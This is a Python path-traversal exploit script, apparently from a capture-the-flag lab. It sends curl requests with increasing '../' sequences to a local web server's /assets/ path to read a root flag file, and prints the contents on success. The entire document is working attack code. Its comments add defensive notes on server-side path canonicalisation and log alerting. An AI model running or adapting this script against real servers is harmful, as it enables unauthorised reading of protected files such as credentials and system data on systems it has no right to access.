exploit.py
#!/usr/bin/env python3
import subprocess
import signal
from colorama import Fore, Style, init
# Initialise colorama; autoreset=True resets colour/style after each print,
# so the Fore/Style codes used below do not carry over into later output.
init(autoreset=True)
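def handle_exit_signal(sig, frame):
    """Handle Ctrl+C (SIGINT): report the interruption and exit with status 0.

    Args:
        sig: Signal number passed in by the ``signal`` module (unused).
        frame: Interrupted stack frame passed in by the ``signal`` module
            (unused).

    Raises:
        SystemExit: Always, with exit code 0.
    """
    print(f"{Fore.RED}[!] Interrupted by user.")
    # ``exit`` is a helper injected by the ``site`` module and is missing under
    # ``python -S`` or in frozen builds; raising SystemExit is the built-in
    # equivalent and needs no import.
    raise SystemExit(0)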
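# Route Ctrl+C through the handler so an interrupted run exits cleanly.
signal.signal(signal.SIGINT, handle_exit_signal)

# Number of requests; round i prefixes the file path with i "../" segments.
request = 5

# Loop-invariant parts of the request, hoisted out of the loop.
url = "http://localhost:8081/assets/"
file = "root/root.txt"  # Flag root/root.txt

# Start
print(f"{Fore.CYAN}{Style.BRIGHT}Sending payloads...")

# --path-as-is tells curl to send the "../" segments exactly as written
# instead of collapsing them client-side, so each round checks whether the
# server behind /assets/ normalises the request path itself. A 200 suggests
# the handler resolved the path outside its asset directory; the server-side
# fix is to canonicalise the joined path and reject anything that does not
# stay under the asset root. Requests like these show up in access logs as
# literal "../" sequences in the path, which is the pattern to alert on.
for i in range(1, request + 1):
    payload = "../" * i
    final_payload = url + payload + file
    command = [
        "curl",
        "--path-as-is",
        "-i",
        final_payload,
    ]

    # progress
    print(f"{Fore.YELLOW}Round {i}: {final_payload}")

    try:
        # timeout keeps a stalled service from hanging the run indefinitely
        # (10 s is an arbitrary bound for a local target).
        output = subprocess.run(
            command,
            capture_output=True,
            text=True,
            check=True,
            timeout=10,
        )
    except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
        print(f"{Fore.RED}[!] Error: {e}")
        continue
    except FileNotFoundError as e:
        # curl is not installed; every further round would fail the same way.
        print(f"{Fore.RED}[!] Error: {e}")
        break

    # With -i the first line of stdout is the HTTP status line.
    status_line = output.stdout.split("\r\n", 1)[0]
    status_parts = status_line.split()
    if len(status_parts) < 2:
        # Empty or malformed response: the original indexing raised an
        # uncaught IndexError here.
        print(f"{Fore.RED}[!] Error: unexpected response: {status_line!r}")
        continue

    # 200?
    if status_parts[1] == "200":
        print(f"{Fore.GREEN}{Style.BRIGHT}[+] Success! File found.")
        print(f"{Fore.GREEN}{output.stdout}")
        break
else:
    # Loop finished without a break: no round produced a 200 response.
    print(f"{Fore.YELLOW}[-] No round returned 200.")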